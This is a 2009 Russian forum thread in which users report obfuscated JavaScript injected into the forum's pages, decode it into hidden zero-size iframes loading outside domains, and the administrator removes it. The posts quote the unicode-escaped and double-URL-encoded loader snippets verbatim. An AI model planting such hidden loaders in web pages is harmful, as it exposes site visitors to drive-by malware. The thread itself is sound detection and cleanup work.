Так и надо!? Подозрительный код на форуме. |
Здравствуйте, гость ( Вход | Регистрация )
Так и надо!? Подозрительный код на форуме. |
2.6.2009, 21:32
Сообщение
#1
|
|
почтенный флудер Группа: Пользователи Сообщений: 225 Регистрация: 8.5.2009 Из: Москва, ЮАО |
Не знаю зачем но глянул тут внутрянку страниц сайта и форума, на сайте то кроме кроме нюансов верстки больше придраться не к чему, а вот на форуме меня заинтересовало несколько строчек.
Во первых 16ая строка, которая в "зашифрованном" виде выглядит вот так (поставил несколько пробелов что б страницу не разрывало по горизонту): Код <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020 \u0073\u0072\u0063 \u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0072\u0074\u002d\u006b\u0079\u0069 \u0076\u002e\u0063\u006f\u006d\u002f\u0035\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070 \u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065 \u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f \u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script> А при "очеловечивании" (декодировании) магическим образом превращается в: Код <iframe[space]src=” (straight quotes)http://art– (minus)kyiv. (period)com/50/index. (period)php” (straight quotes)[space]width=” (straight quotes)0” (straight quotes)[space]height=” (straight quotes)0” (straight quotes)[space]frameborder=” (straight quotes)0” (straight quotes)></iframe> Нулевой ифрэйм!? Прикольно! Сайт по адресу "art-kyiv.com" в данный момент не работает т.к. не оплачен, но как удалось понять это какая то украинская галерея искусств! Это к вам имеет отношение!? Ну и во-вторых, 17ая строка, которая выглядит следующим образом: Код <iframe src="http://georgenatas.in/cn.php?aba" width="0" height="0" style="display:none;"></iframe> По этому сайту и домену еще больше непонятного. Для просмотра он недоступен, упоминаний о нем в поиске практически нет, а из тех что есть толком ничего не понятно. Да и вообще, если я вижу такие шифры, ифрэймы с нулевыми размерами и запретом отображения на экране... Странно как то это все... Или вы вкурсе про это дело и так и должно быть? |
|
|
2.6.2009, 22:25
Сообщение
#2
|
|
почтенный флудер Группа: Пользователи Сообщений: 168 Регистрация: 26.5.2009 Из: Московская область |
Во-во! вот эта хня уже достала... ""art-kyiv.com"
|
|
|
2.6.2009, 22:29
Сообщение
#3
|
|
Начинающий беспредельщик Группа: Пользователи Сообщений: 1167 Регистрация: 12.3.2009 Из: 33 Еврейский Автономный Округ |
Катрин, для какой ты выставки сайтик то делала???
|
|
|
3.6.2009, 8:03
Сообщение
#4
|
|
шустрый юзер Группа: Пользователи Сообщений: 60 Регистрация: 23.4.2009 Из: Лужковск |
Угу. И опять с этого сайта открываются странные PDF-ки. Единственно содержание которых (насколько я понял) - JavaScript
|
|
|
3.6.2009, 15:31
Сообщение
#5
|
|
Администратор Группа: Администраторы Сообщений: 16 Регистрация: 10.3.2009 Из: Moscow |
Код <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020 \u0073\u0072\u0063 \u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0072\u0074\u002d\u006b\u0079\u0069 \u0076\u002e\u0063\u006f\u006d\u002f\u0035\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070 \u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065 \u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f \u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script> Код <iframe src="http://georgenatas.in/cn.php?aba" width="0" height="0" style="display:none;"></iframe> ага...нашла эти коды в базе...удалила...все стало хорошо...я надеюсь у всех... |
|
|
3.6.2009, 23:51
Сообщение
#6
|
|
почтенный флудер Группа: Пользователи Сообщений: 168 Регистрация: 26.5.2009 Из: Московская область |
Да, спасибо большое. у меня все нормально. Да думаю и у всех тоже.
|
|
|
5.6.2009, 1:41
Сообщение
#7
|
|
почтенный флудер Группа: Пользователи Сообщений: 225 Регистрация: 8.5.2009 Из: Москва, ЮАО |
Проверяйте код где формируется нижняя часть страниц форума, примерно 30ая строки снизу, текст бяки выглядит следующим образом:
Код <script>eval(unescape("eval%28unescape%28%22document.write%2528String.fromCharCode %252860%252C105%252C102%252C114%252C97%252C109%252C101%252C32%252C115 %252C114%252C99%252C61%252C34%252C104%252C116%252C116%252C112%252C58%252C47 %252C47%252C97%252C114%252C116%252C45%252C107%252C121%252C105%252C118%252C46 %252C99%252C111%252C109%252C47%252C53%252C48%252C47%252C105%252C110%252C100 %252C101%252C120%252C46%252C112%252C104%252C112%252C34%252C32%252C119%252C105 %252C100%252C116%252C104%252C61%252C34%252C48%252C34%252C32%252C104%252C101 %252C105%252C103%252C104%252C116%252C61%252C34%252C48%252C34%252C32%252C115 %252C116%252C121%252C108%252C101%252C61%252C34%252C100%252C105%252C115%252C112 %252C108%252C97%252C121%252C58%252C110%252C111%252C110%252C101%252C59%252C34 %252C62%252C60%252C47%252C105%252C102%252C114%252C97%252C109%252C101%252C62 %2529%2529%253B%22%29%29%3B"));</script> Советую не тянуть с этим делом, уже гугл хром не пускает к вам на форум, ругается на потенциально небезопасный контент!!! |
|
|
5.6.2009, 9:18
Сообщение
#8
|
|
Администратор Группа: Администраторы Сообщений: 16 Регистрация: 10.3.2009 Из: Moscow |
Проверяйте код где формируется нижняя часть страниц форума, примерно 30ая строки снизу, текст бяки выглядит следующим образом: Код <script>eval(unescape("eval%28unescape%28%22document.write%2528String.fromCharCode %252860%252C105%252C102%252C114%252C97%252C109%252C101%252C32%252C115 %252C114%252C99%252C61%252C34%252C104%252C116%252C116%252C112%252C58%252C47 %252C47%252C97%252C114%252C116%252C45%252C107%252C121%252C105%252C118%252C46 %252C99%252C111%252C109%252C47%252C53%252C48%252C47%252C105%252C110%252C100 %252C101%252C120%252C46%252C112%252C104%252C112%252C34%252C32%252C119%252C105 %252C100%252C116%252C104%252C61%252C34%252C48%252C34%252C32%252C104%252C101 %252C105%252C103%252C104%252C116%252C61%252C34%252C48%252C34%252C32%252C115 %252C116%252C121%252C108%252C101%252C61%252C34%252C100%252C105%252C115%252C112 %252C108%252C97%252C121%252C58%252C110%252C111%252C110%252C101%252C59%252C34 %252C62%252C60%252C47%252C105%252C102%252C114%252C97%252C109%252C101%252C62 %2529%2529%253B%22%29%29%3B"));</script> Советую не тянуть с этим делом, уже гугл хром не пускает к вам на форум, ругается на потенциально небезопасный контент!!! Ага...удалила этот код в базе... Спасибо!!! |
|
|
5.6.2009, 9:56
Сообщение
#9
|
|
почтенный флудер Группа: Пользователи Сообщений: 225 Регистрация: 8.5.2009 Из: Москва, ЮАО |
|
|
|
Версия для КПК | Сейчас: 28.4.2024, 5:33 |